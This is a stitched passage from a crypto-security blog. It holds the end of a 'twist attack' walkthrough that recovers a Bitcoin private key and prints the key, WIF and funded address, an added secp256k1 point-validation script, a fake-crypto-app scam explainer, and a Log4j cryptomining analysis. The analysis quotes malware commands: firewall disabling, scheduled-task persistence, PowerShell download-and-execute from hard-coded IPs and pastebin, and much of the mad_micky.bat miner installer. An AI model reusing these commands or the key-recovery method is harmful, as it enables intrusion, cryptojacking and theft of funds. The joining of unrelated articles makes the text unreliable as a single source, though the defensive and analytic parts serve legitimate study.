        Q64 = E6([109180854384525934106792159822888807664445139819154775748567618515646342974321, 102666617356998521143219293179463920284010473849613907153669896702897252016986])

        RawTX = 01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000

    Now let's add the obtained secp256k1 points. To do this, open the Python script discrete.py

    To run the Python script discrete.py, install SageMath

    Installation command:

        sudo apt-get update
        sudo apt-get install -y python3-gmpy2
        yes '' | sudo env DEBIAN_FRONTEND=noninteractive apt-get -y -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" install sagemath

    Check the SageMath installation with the command:

        sage -v

        SageMath version 9.0

    To solve the discrete logarithm (Pollard's rho algorithm for logarithms), run the Python script discrete.py

    Run command:

        sage -python3 discrete.py

    Result:

        Discrete_log_rho:
        14996641256 1546 19575 31735 9071789 145517682 11552 7151 3370711 10797447604 10120546250224

        PRIVATE KEY:
        3160389728152122137789469305939632411648887242506549174582525524562820572318

        privkey = crt([x11, x21, x22, x31, x32, x33, x41, x61, x62, x63, x64], [ord11, ord21, ord22, ord31, ord32, ord33, ord41, ord61, ord62, ord63, ord64])

    Convert the private key to HEX format

    The decimal form of the private key was saved to the file: privkey.txt

    Run the Python script privkey2hex.py

        python3 privkey2hex.py
        cat privkey2hex.txt

    Open the resulting file: privkey2hex.txt

    Private key in HEX format:

        PrivKey = 06fcb79a2eabffa519509e43b7de95bc2df15ca48fe6be29f9160bcd6ac1a49e

    Open bitaddress and check:

        ADDR: 1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx
        WIF: KwTHx3AhV8qiN6qyfG1D85TGEeUBiaMUjnQ11eVLP5NAfiVNLLmS
        HEX: 06FCB79A2EABFFA519509E43B7DE95BC2DF15CA48FE6BE29F9160BCD6AC1A49E

    https://live.blockcypher.com/btc/address/1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx/

    BALANCE: $ 902.52

    Source code
    ATTACKSAFE SOFTWARE
    Telegram: https://t.me/cryptodeeptech
    Video: https://youtu.be/pOviZOYItv4
    Source: https://cryptodeep.ru/twist-attack-2
    Cryptanalysis
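The defensive counterpart to the walkthrough above, as an added example that is not part of the original post or its tooling: points that satisfy y^2 = x^3 + b for a b other than 7 (the E1 to E6 equations listed in the post) are only useful against code that never checks the curve equation, so a parser should reject them before any scalar multiplication. The function names and the small sample points are constructed for illustration; the constants are the standard secp256k1 parameters.

```python
"""On-curve validation for secp256k1 public keys (added example)."""

# Standard secp256k1 domain parameters: y^2 = x^3 + 0x + 7 over GF(P).
P = 2**256 - 2**32 - 977
A, B = 0, 7
GX = 0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798
GY = 0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8


def implied_b(x, y):
    """Return the constant b' for which (x, y) satisfies y^2 = x^3 + ax + b' mod P."""
    return (y * y - x * x * x - A * x) % P


def is_on_secp256k1(x, y):
    """Accept only reduced coordinates that satisfy the real curve equation."""
    if not (0 <= x < P and 0 <= y < P):
        return False
    return implied_b(x, y) == B


def lift_x(x):
    """Return the even y matching x on secp256k1, or None if no such y exists."""
    if not 0 <= x < P:
        return None
    rhs = (pow(x, 3, P) + B) % P
    y = pow(rhs, (P + 1) // 4, P)      # square root formula valid because P % 4 == 3
    if y * y % P != rhs:
        return None                    # x^3 + 7 is not a square: x is off the curve
    return y if y % 2 == 0 else P - y


def parse_pubkey(raw):
    """Parse a SEC1 public key and raise ValueError unless it lies on secp256k1."""
    if len(raw) == 33 and raw[0] in (2, 3):
        x = int.from_bytes(raw[1:], "big")
        y = lift_x(x)
        if y is None:
            raise ValueError("compressed key: x has no point on secp256k1")
        if y % 2 != raw[0] % 2:        # prefix 02 means even y, 03 means odd y
            y = P - y
        return x, y
    if len(raw) == 65 and raw[0] == 4:
        x = int.from_bytes(raw[1:33], "big")
        y = int.from_bytes(raw[33:], "big")
        if not is_on_secp256k1(x, y):
            raise ValueError(
                f"point satisfies y^2 = x^3 + {implied_b(x, y)}, not y^2 = x^3 + 7"
            )
        return x, y
    raise ValueError("unsupported public key encoding")


# Constructed sample points, one per foreign curve equation named in the post.
OFF_CURVE_SAMPLES = {
    1: (2, 3),          # 3^2 = 2^3 + 1
    2: (P - 1, 1),      # 1^2 = (-1)^3 + 2
    3: (1, 2),          # 2^2 = 1^3 + 3
    4: (0, 2),          # 2^2 = 0^3 + 4
}

if __name__ == "__main__":
    for b, (x, y) in OFF_CURVE_SAMPLES.items():
        print(f"b'={implied_b(x, y)} accepted={is_on_secp256k1(x, y)} (expected b'={b})")
    print("generator accepted:", is_on_secp256k1(GX, GY))
```

Because secp256k1 has cofactor 1, passing this equation check is enough to place a point in the intended group; no separate subgroup test is needed.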
  15. CRYPTO DEEP TECH

    The rise of fake cryptocurrency apps and how to avoid them.

    Scammers are using fake crypto apps to steal funds from investors. Some malicious apps find their way into official app stores. And, according to the latest fraud report, fraudsters are using fake crypto apps to steal money from unsuspecting crypto investors. It highlights that American investors have lost approximately $42.7 million to swindlers through fake apps. The schemes reportedly take advantage of heightened interest in cryptocurrencies, especially during bull market runs, to beguile crypto users.

    How fake crypto app scammers lure users

    Fake crypto app scammers use myriad techniques to entice investors. The following is a breakdown of some of them.

    Social engineering schemes

    Some fake crypto app scammer networks use social engineering strategies to entice victims. In many cases, the fraudsters befriend the victims through social platforms such as dating sites and then trick them into downloading apps that appear to be functional cryptocurrency trading apps. The scammers then convince users to transfer funds to the app. The funds are, however, “locked in” once the transfer is made, and the victims are never allowed to withdraw money. In some cases, the scammers lure victims using outlandish high-yield claims. The ruse comes to an end when the victims realize that they can’t redeem their funds.

    Speaking to Cointelegraph earlier this week, Rick Holland, chief information security officer of Digital Shadows — a digital risk protection firm — underscored that social engineering remains a top strategy among crooks because it requires minimal effort. “Relying upon the tried-and-true method of social engineering is far more practical and lucrative,” he said. The cybersecurity manager added that social engineering makes it easy for scammers to target high-net-worth individuals.

    Context: Bob (fake name, real person) received a text claiming to be from his exchange.
    The message states that due to the recent ban on crypto in China, all users must withdraw their funds to a DeFi wallet. The text also included a link to the wallet where Bob can transfer his funds. After downloading the wallet, Bob removed all of his funds from the exchange. More than $10 million in ERC20-USDT were transferred. Little did Bob know that he had just become the victim of a phishing scam. Bob reached out to us for help recovering his funds.

    Bob wasn’t the first person to contact us regarding these scams. Scams are becoming more common as interest in cryptocurrency grows. According to data from our MistTrack service, more than 60% of all reported hacks were related to fake wallets.

    There are several ways to protect yourself against phishing attacks:

    • Never click on any link from an unknown source, even if it appears legitimate. Scammers frequently send emails or texts containing links to a fake wallet.
    • Always go to the original website rather than clicking on sponsored ads. Scammers often purchase ad space on search engines to promote their counterfeit website that often appears genuine.
    • Scammers will regularly message you pretending to help. After gaining your trust, they will send you a link to download their app and transfer funds to it. They will often fabricate why you cannot withdraw funds unless you deposit additional funds into it. Many who fall victim to these scams never receive their money back.
    • Scammers would often pose as support from Metamask. They would pretend to help anyone currently having difficulties using Metamask. After gaining their trust, they would send over a link asking the victim to input their seed phrase. Metamask will NEVER ask for your seed phrase or private key.

    This is what a fake Metamask wallet might look like.

    In-depth analysis

    Our team begins to analyze and research the information provided by these victims.
    According to our ongoing investigation, tens of thousands of victims had their assets stolen from these phishing scams. So far, the total amount stolen exceeds $1.3 billion. These are the only funds reported to SlowMist, and we only counted ETH, BTC, TRX, ERC20-USDT, and TRC20-USDT. The graph below depicts the number of reported cases to us during November.

    One victim provided us with the Tron address of the scammer. Using MistTrack, our team was able to track down and analyze the scammer’s address. It showed an additional 14 addresses that had transferred funds to this address. We can assume that these addresses also fell victim to this phishing scam. In total, the scammer was able to walk away with over $250,000 in TRC20-USDT, which they later distributed to various Binance accounts. We followed one of these Binance accounts and discovered it had over $600,000 in TRC20-USDT. Imagine the total amount stolen if this was just one of the addresses the scammer uses.

    As we investigated further into this account, we discovered more illegal activity associated with it. According to our AML (anti-money laundering) software, a BTC address associated with this account (32q…fia) was used for extortion. Through the investigation of this address, we concluded that these phishing schemes were not isolated events but rather part of a larger global scale. Furthermore, our research indicates that the scammer will frequently transfer portions of the funds to multiple exchanges and to another scammer wallet with a significant amount of transactions to confuse our analysis.

    Recognizable brand names

    Some fake crypto app scammers have resorted to using recognizable brand names to push fake apps because of the trust and authority that they wield. In one case highlighted in the latest crypto crime report, cybercriminals posing as YiBit employees recently hoodwinked investors out of some $5.5 million after convincing them to download a bogus YiBit crypto trading app.
    Unbeknown to the investors, the actual YiBit crypto exchange firm ceased operations in 2018. Fund transfers made to the fake app were stolen.

    In another case outlined in the report, phishers using the Supay brand name, which is associated with an Australian crypto company, swindled 28 investors out of millions of dollars. The ploy, which ran between Nov. 1 and Nov. 26, caused $3.7 million in losses.

    Such schemes have been going on for years, but many incidences go unreported due to the lack of proper recourse channels, especially in jurisdictions that shun cryptocurrencies. Besides the U.S., investigations in other major jurisdictions such as India have in the recent past uncovered elaborate fake crypto app schemes. According to a report published by the CloudSEK cybersecurity company in June, a newly discovered fake crypto app scheme involving numerous cloned apps and domains caused Indian investors to lose at least $128 million.

    Distributing fake apps through official app stores

    Fake crypto app scammers sometimes use official app stores to distribute dodgy applications. Some of the apps are designed to collect user credentials that are then used to unlock crypto accounts on corresponding official platforms. Others claim to offer secure wallet solutions that can be used to store a diverse range of cryptocurrencies but pilfer funds once a deposit is made.

    While platforms such as Google Play Store constantly review apps for integrity issues, it is still possible for some fake apps to slip through the cracks. One of the latest methods used by scammers to accomplish this is registering as app developers on popular mobile app stores such as the Apple App Store and Google Play Store and then uploading legitimate-looking apps.

    In 2021, a fake Trezor app masquerading as a wallet created by SatoshiLabs used this strategy to get published on both Apple App Store and Google Play Store.
    The app claimed to provide users with direct online access to their Trezor hardware wallets without needing to connect their Trezor dongle to a computer. Victims who downloaded the fake Trezor app were obligated to submit their wallet seed phrase to start using the service. A seed phrase is a string of words that can be used to access a cryptocurrency wallet on the blockchain. The submitted details allowed the thieves behind the fake app to loot user funds.

    According to a statement provided by Apple, the fake Trezor app was published on its store through a deceptive bait-and-switch maneuver. The app developers are alleged to have initially submitted the app as a cryptography application designed to encrypt files but later on converted it to a cryptocurrency wallet app. Apple said that it was not aware of the change until users reported it.

    Speaking to Cointelegraph earlier this week, Chris Kline, co-founder of Bitcoin IRA — a crypto retirement investment service — said that despite such incidents, major tech companies in the space were resolute in fighting fake crypto apps because of the potential damage to their integrity. He said:

    “Tech companies are always looking for better education and security for their users. The most reputable players today put security at the forefront of their roadmaps. Users need reassurance that their digital assets are safe and providers are keeping security top of mind.”

    That said, the fake app problem is more prevalent in non-official app stores.

    Cryptocurrency is risky enough without having to worry about scams. No matter which one you choose, you will deal with volatile values. Throw in some crooks, and the risk goes up exponentially.

    Social media is a goldmine for scammers to find new victims. Now, fake crypto ads are circulating on Facebook and other platforms. The ads use images of well-known industry leaders to lure people into buying crypto that doesn’t exist.
    Cybersecurity researchers recently found 40 copycat sites designed to look like legitimate crypto services. The sites advertise crypto wallet apps that are anything but legitimate. Keep reading to find out the risks and protect your finances.

    Watch your wallet

    Cryptocurrency wallets are physical or digital storage devices for your cryptocurrency. The wallets themselves hold public and private keys, which give you access to your crypto.

    How to spot a fake crypto app

    Fake cryptocurrency apps are designed to resemble legitimate apps as closely as possible. As a crypto investor, one should be able to discern between legitimate and fake apps to avoid unnecessary losses. The following is a breakdown of some of the things to look out for when trying to ascertain the authenticity of a mobile crypto application.

    Evidence shows that a crook is recruiting partners to distribute these bad apps via telemarketing, social media, advertisement, SMS, third-party channels, fake websites and more.

    ESET researchers also uncovered malicious wallets being distributed via legitimate Chinese websites, with articles containing links to fake wallet apps. The posts used real wallet names such as Coinbase, imToken, Bitpie, MetaMask, TokenPocket, OneKey and Trust Wallet but led to copycat websites.

    A thief used another legitimate Chinese website to post an article about Beijing’s crypto ban. The author included a list of genuine crypto wallets to get around the ban, along with links to bogus websites with download links for fake apps.

    Different effects on iOS and Android

    The malware works differently depending on your operating system. The fake Android wallet apps target new crypto users who do not have a legitimate wallet app installed on their devices. If you already have an official wallet app, the malicious one won’t be installed due to Android security measures, which don’t let you replace an original app with one that isn’t legitimate.
    The copycat websites let Android users download the malicious apps from their servers even if they tap on the “Get it on Google Play” button. Following that, the app needs to be installed manually.

    When it comes to iOS, multiple versions of an app can be installed simultaneously. But due to Apple’s stricter screening process, you won’t find these malicious apps in the App Store. So if you are an Apple user, you’d have to install the malicious apps from a third-party store or click on malicious links found on places like social media.

    The websites for these apps let users download apps outside the official store, using a system Apple put in place for businesses and educational institutes to install custom apps without going through the App Store. You must then manually install these apps.

    Once the app is up and running, it appears to work like a legitimate crypto wallet. But it isn’t. Instead, it’s stealing the currency deposited into it.

    Spelling, icons and description

    The first step in ascertaining whether an app is legit is checking out the spelling and icon. Fake apps usually have a name and icon that looks similar to the legitimate one, but something is usually off. If the app or developer names are misspelled, for example, the software is most likely phony. A quick search about the app on the internet will help to confirm its legitimacy.

    It is also important to consider if the app has a Google Editor’s choice badge. The badge is a distinction provided by the Google Play editorial team to recognize developers and apps with outstanding quality. Apps with this badge are unlikely to be fake.

    Don’t be a victim

    Follow these tips to keep crypto scammers at bay:

    • Use official apps from official app stores that contain links to official websites.
    • Be wary of online ads for crypto.
    • Research any wallet app you’re interested in. Look for reviews and information about the company behind the app.
    • Before you buy crypto, read Kim’s eBook on the subject.

    Application permissions

    Counterfeit apps usually request more permissions than necessary. This ensures that they glean as much data as possible from victims’ devices. As such, users should be wary of apps that require off-center permissions, such as device administrator privileges. Such authorizations could give cybercriminals unfettered access to a device and allow them to intercept sensitive data that can be used to unlock financial accounts, including crypto wallets. Intrusive app permissions can be blocked via a phone system’s privacy settings.

    Fake websites

    Scammers sometimes create fake cryptocurrency trading platforms or fake versions of official crypto wallets to trick unsuspecting victims. These fake websites usually have similar but slightly different domain names from the sites they attempt to mimic. They look very similar to legitimate sites, making it difficult to tell the difference. Fake crypto sites often operate in one of two ways:

    • As phishing pages: All the details you enter, such as your crypto wallet’s password and recovery phrase and other financial information, end up in the scammers’ hands.
    • As straightforward theft: Initially, the site may allow you to withdraw a small amount of money. As your investments seem to perform well, you might invest more money in the site. However, when you subsequently want to withdraw your money, the site either shuts down or declines the request.

    Phishing scams

    Crypto phishing scams often target information relating to online wallets. Scammers target crypto wallet private keys, which are required to access funds within the wallet. Their method of working is similar to other phishing attempts and related to the fake websites described above. They send an email to lure recipients to a specially created website asking them to enter private key information. Once the hackers have acquired this information, they steal the cryptocurrency in those wallets.

    Pump and dump schemes

    This involves a particular coin or token being hyped by fraudsters through an email blast or social media such as Twitter, Facebook, or Telegram. Not wanting to miss out, traders rush to buy the coins, driving up the price. Having succeeded in inflating the price, the scammers then sell their holdings – which causes a crash as the asset’s value sharply declines. This can happen within minutes.

    Fake apps

    Another common way scammers trick cryptocurrency investors is through fake apps available for download through Google Play and the Apple App Store. Although these fake apps are quickly found and removed, that doesn’t mean the apps aren’t impacting many bottom lines. Thousands of people have downloaded fake cryptocurrency apps.

    Fake celebrity endorsements

    Crypto scammers sometimes pose as or claim endorsements from celebrities, businesspeople, or influencers to capture the attention of potential targets. Sometimes, this involves selling phantom cryptocurrencies that don’t exist to novice investors. These scams can be sophisticated, involving glossy websites and brochures that appear to show celebrity endorsements from household names such as Elon Musk.

    Giveaway scams

    This is where scammers promise to match or multiply the cryptocurrency sent to them in what is known as a giveaway scam. Clever messaging from what often looks like a valid social media account can create a sense of legitimacy and spark a sense of urgency. This supposed ‘once-in-a-lifetime’ opportunity can lead people to transfer funds quickly in the hope of an instant return.

    Blackmail and extortion scams

    Another method scammers use is blackmail. They send emails that claim to have a record of adult websites visited by the user and threaten to expose them unless they share private keys or send cryptocurrency to the scammer.

    Cloud mining scams

    Cloud mining refers to companies that allow you to rent mining hardware they operate in exchange for a fixed fee and a share of the revenue you will supposedly make. In theory, this allows people to mine remotely without buying expensive mining hardware. However, many cloud mining companies are scams or, at best, ineffective – in that you end up losing money or earning less than was implied.

    Fraudulent initial coin offerings (ICOs)

    An initial coin offering or ICO is a way for start-up crypto companies to raise money from future users. Typically, customers are promised a discount on the new crypto coins in exchange for sending active cryptocurrencies like bitcoin or another popular cryptocurrency. Several ICOs have turned out to be fraudulent, with criminals going to elaborate lengths to deceive investors, such as renting fake offices and creating high-end marketing materials.

    How to spot cryptocurrency scams

    So, how to spot a crypto scam? Warning signs to look out for include:

    • Promises of guaranteed returns: No financial investment can guarantee future returns because investments can go down as well as up. Any crypto offering that promises you will definitely make money is a red flag.
    • A poor or non-existent whitepaper: Every cryptocurrency should have a whitepaper since this is one of the most critical aspects of an initial coin offering. The whitepaper should explain how the cryptocurrency has been designed and how it will work. If the whitepaper doesn’t make sense – or worse, doesn’t exist – then tread carefully.
    • Excessive marketing: All businesses promote themselves. But one way that crypto fraudsters attract people is by investing in heavy marketing – online advertising, paid influencers, offline promotion, and so on. This is designed to reach as many people as possible in the shortest time possible – to raise money fast.
      If you feel that the marketing for a crypto offering seems heavy-handed or makes extravagant claims without backing them up, pause and do further research.
    • Unnamed team members: With most investment businesses, it should be possible to find out who the key people behind it are. Usually, this means easy-to-find biographies of the people who run the investment plus an active presence on social media. If you can’t find out who is running a cryptocurrency, be cautious.
    • Free money: Whether in cash or cryptocurrency, any investment opportunity promising free money is likely to be fake.

    How to protect yourself from cryptocurrency scams

    Many crypto frauds are sophisticated and convincing. Here are some steps you can take to protect yourself:

    • Protect your wallet: To invest in cryptocurrency, you need a wallet with private keys. If a firm asks you to share your keys to participate in an investment opportunity, it’s highly likely to be a scam. Keep your wallet keys private.
    • Keep an eye on your wallet app: The first time you transfer money, send only a small amount to confirm the legitimacy of a crypto wallet app. If you’re updating your wallet app and you notice suspicious behavior, terminate the update, and uninstall the app.
    • Only invest in things you understand: If it’s not clear to you how a particular cryptocurrency works, then it’s best to pause and do further research before you decide whether to invest.
    • Take your time: Scammers often use high-pressure tactics to get you to invest your money quickly – for example, by promising bonuses or discounts if you participate straightaway. Take your time and carry out your own research before investing any money.
    • Be wary of social media adverts: Crypto scammers often use social media to promote their fraudulent schemes. They may use unauthorized images of celebrities or high-profile businesspeople to create a sense of legitimacy, or they may promise giveaways or free cash.
Maintain a healthy skepticism when you see crypto opportunities promoted on social media and do your due diligence.

Ignore cold calls: If someone contacts you out of the blue to sell you a crypto investment opportunity, it’s probably a scam. Never disclose personal information or transfer money to someone who contacts you in this way.

Only download apps from official platforms: Although fake apps can end up in the Google Play Store or Apple App Store, it is safer to download apps from these platforms than elsewhere.

Do your research: The most popular cryptocurrencies are not scams. But if you haven’t heard of a particular cryptocurrency, research it – see if there is a whitepaper you can read, find out who runs it and how it operates, and look for genuine reviews and testimonials. Look for an up-to-date and credible fake cryptocurrency list to check for scams.

Is it too good to be true: Companies that promise guaranteed returns or to make you rich overnight are likely to be scams. If something seems too good to be true, tread carefully.

Finally, as with any investment opportunity, never invest money you can’t afford to lose. Even if you’re not being scammed, cryptocurrency is volatile and speculative, so it’s essential to understand the risks.

What to do if you fall victim to a crypto scam

Falling victim to a cryptocurrency scam can be devastating, and it’s essential to act quickly if you have made a payment or disclosed personal information. Contact your bank immediately if you have:

Made a payment using a debit or credit card.
Made a payment via bank transfer.
Shared personal details about yourself.

Crypto fraudsters often sell the details they have captured to other criminals. So, it’s essential to change your usernames and passwords across the board, to prevent further damage. If you are the victim of a social media crypto scam, you can report it to the relevant social media platform.
Depending on where you live, you can report frauds to the relevant body in your jurisdiction – for example, in the US, that would be the Federal Trade Commission. Other countries have their own equivalents.

The number of downloads

The number of times that an app has been downloaded is usually an indicator of how popular it is. Apps from reputable developers typically have millions of downloads and thousands of positive reviews. Inversely, apps with just a few thousand downloads require greater scrutiny.

Confirming authenticity by contacting support

If unsure about an application, contacting support through the company’s official website could help to avoid financial losses due to fraud. Furthermore, authentic apps can be downloaded from a company’s official website.

Cryptocurrencies are underpinned by relatively new technology, so it is only natural that there are teething problems when it comes to use and adoption. Unfortunately, in recent years, black hats have targeted naïve crypto enthusiasts using fake crypto apps. While the problem is likely to persist for several years, increased scrutiny by tech companies is likely to temper the issue in the long run.

Literature:

Investigation of Cryptocurrency Wallets on iOS and Android Mobile Devices for Potential Forensic Artifacts, Angelica Montanez. https://cryptodeep.ru/doc/Montanez-Angelica_Final-Research-Paper.pdf

Summary

This type of fraudulent activity is not only prevalent at the moment, but it is also on the rise. Every day, a growing number of people fall victim to this. Users should always be cautious and suspicious of phishing scams.

Telegram: https://t.me/cryptodeeptech
Video: https://youtu.be/EkU8YhB91MI
Source: https://cryptodeep.ru/crypto-wallet-protection
  16. CRYPTO DEEP TECH

Background on Log4j

Alibaba Cloud Security Team publicly disclosed a critical vulnerability (CVE-2021-44228) enabling unauthenticated remote code execution against multiple versions of Apache Log4j2 (Log4Shell). Vulnerable servers can be exploited by attackers connecting via any protocol such as HTTPS and sending a specially crafted string.

Log4j crypto-mining campaign

Darktrace detected crypto-mining on multiple customer deployments which occurred as a result of exploiting this Log4j vulnerability. In each of these incidents, exploitation occurred via outbound SSL connections which appear to be requests for base64-encoded PowerShell scripts to bypass perimeter defenses and download batch (.bat) script files, and multiple executables that install crypto-mining malware. The activity had wider campaign indicators, including common hard-coded IPs, executable files, and scripts.

The attack cycle begins with what appears to be opportunistic scanning of Internet-connected devices looking for VMware Horizon servers vulnerable to the Log4j exploit. Once a vulnerable server is found, the attacker makes HTTP and SSL connections to the victim. Following successful exploitation, the server performs a callback on port 1389, retrieving a script named mad_micky.bat. This achieves the following:

Disables Windows firewall by setting all profiles to state=off: ‘netsh advfirewall set allprofiles state off’

Searches for existing processes that indicate other miner installs, using ‘netstat -ano | findstr TCP’ to identify any process operating on ports :3333, :4444, :5555, :7777, :9000, and stops the processes running

A new webclient is initiated to silently download wxm.exe

Scheduled tasks are used to create persistence.
The command ‘schtasks /create /F /sc minute /mo 1 /tn –‘ schedules a task and suppresses warnings; the task is to be scheduled within a minute of the command and is given the name ‘BrowserUpdate’, pointing to the malicious domain ‘b.oracleservice[.]top’ and hard-coded IPs: 198.23.214[.]117:8080 -o 51.79.175[.]139:8080 -o 167.114.114[.]169:8080

Registry keys are added in RunOnce for persistence: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run2 /d

In at least two cases, the mad_micky.bat script was retrieved in an HTTP connection which had the user agent Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS). This was the first and only time this user agent was seen on these networks. It appears this user agent is used legitimately by some ASUS devices with fresh factory installs; however, as a new user agent only seen during this activity, it is suspicious.

Following successful exploitation, the server performs a callback on port 1389 to retrieve script files. In this example, /xms.ps1 is a base64-encoded PowerShell script that bypasses execution policy on the host to call for ‘mad_micky.bat’:

Figure 1: Additional insight on PowerShell script xms.ps1

The snapshot details the event log for an affected server and indicates successful Log4j RCE that resulted in the mad_micky.bat file download:

Figure 2: Log data highlighting mad_micky.bat file

Additional connections were initiated to retrieve executable files and scripts. The scripts contained two IP addresses located in Korea and Ukraine. A connection was made to the Ukrainian IP to download the executable file xm.exe, which activates the miner. The miner (XMRig Miner in this case) is an open-source, cross-platform mining tool available for download from multiple public locations. The next observed exe download was for ‘wxm.exe’ (f0cf1d3d9ed23166ff6c1f3deece19b4).
Figure 3: Additional insight regarding XMRig executable

The connection to the Korean IP involved a request for another script (/2.ps1) as well as an executable file (LogBack.exe). This script deletes running tasks associated with logging, including SCM event log filter or PowerShell event log consumer. The script also requests a file from Pastebin, which is possibly a Cobalt Strike beacon configuration file. The log deletions were carried out through scheduled tasks and WMI, and included: Eventlogger, SCM Event Log Filter, DSM Event Log Consumer, PowerShell Event Log Consumer, Windows Events Consumer, BVTConsumer.

Config file (no longer hosted):

IEX (New-Object System.Net.Webclient) DownloadString(‘hxxps://pastebin.com/raw/g93wWHkR’)

The second file requested from Pastebin, though no longer hosted by Pastebin, is part of a schtasks command, and so was probably used to establish persistence:

schtasks /create /sc MINUTE /mo 5 /tn “\Microsoft\windows\.NET Framework\.NET Framework NGEN v4.0.30319 32” /tr “c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c ‘IEX ((new-object net.webclient).downloadstring(”hxxps://pastebin.com/raw/bcFqDdXx”’))'” /F /ru System

The executable file Logback.exe is another XMRig mining tool. A config.json file was also downloaded from the same Korean IP. After this, cmd.exe and wmic commands were used to configure the miner. These file downloads and miner configuration were followed by additional connections to Pastebin.
Figure 4: OSINT correlation of mad_micky.bat file

Process specifics — mad_micky.bat file

Install
set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup”
looking for the following utilities: powershell, find, findstr, tasklist, sc
set “LOGFILE=%USERPROFILE%\mimu6\xmrig.log”
if %EXP_MONER_HASHRATE% gtr 8192 ( set PORT=18192 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 4096 ( set PORT=14906 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 2048 ( set PORT=12048 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 1024 ( set PORT=11024 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 512 ( set PORT=10512 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 256 ( set PORT=10256 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 128 ( set PORT=10128 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 64 ( set PORT=10064 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 32 ( set PORT=10032 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 16 ( set PORT=10016 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 8 ( set PORT=10008 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 4 ( set PORT=10004 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 2 ( set PORT=10002 & goto PORT_OK)
set port=10001

Preparing miner
echo [*] Removing previous mimu miner (if any)
sc stop gado_miner
sc delete gado_miner
taskkill /f /t /im xmrig.exe
taskkill /f /t/im logback.exe
taskkill /f /t /im network02.exe
:REMOVE_DIR0
echo [*] Removing “%USERPROFILE%\mimu6” directory
timeout 5
rmdir /q /s “USERPROFILE%\mimu6” >NUL 2>NUL
IF EXIST “%USERPROFILE%\mimu6” GOTO REMOVE_DIR0

Download of XMRIG
echo [*] Downloading MoneroOcean advanced version of XMRig to “%USERPROFILE%\xmrig.zip”
powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘http://141.85.161[.]18/xmrig.zip’, ;%USERPROFILE%\xmrig.zip’)”
echo copying to mimu directory
if errorlevel 1 ( echo ERROR: Can’t download MoneroOcean advanced version of xmrig goto MINER_BAD)

Unpack and install
echo [*]
Unpacking “%USERPROFILE%\xmrig.zip” to “%USERPROFILE%\mimu6”
powershell -Command “Add-type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(‘%USERPROFILE%\xmrig.zip’, ‘%USERPROFILE%\mimu6’)”
if errorlevel 1 ( echo [*] Downloading 7za.exe to “%USERPROFILE%za.exe”
powershell -Command “$wc = New-Object System.Net.WebClient; $wc.Downloadfile(‘http://141.85.161[.]18/7za.txt’, ‘%USERPROFILE%za.exe’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”url\”: *\”.*\”,’, ‘\”url\”: \”207.38.87[.]6:3333\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”user\”: *\”.*\”,’, ‘\”user\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”pass\”: *\”.*\”,’, ‘\”pass\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”max-cpu-usage\”: *\d*,’, ‘\”max-cpu-usage\”: 100,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
set LOGFILE2=%LOGFILE:\=\\%
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”log-file\”: *null,’, ‘\”log-file\”: \”%LOGFILE2%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
if %ADMIN% == 1 goto ADMIN_MINER_SETUP
if exist “%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” ( set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” goto STARTUP_DIR_OK )
if exist “%USERPROFILE%\Start Menu\Programs\Startup” ( set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup” goto STARTUP_DIR_OK )
echo [*] Downloading tools to make gado_miner service to
“%USERPROFILE%\nssm.zip”
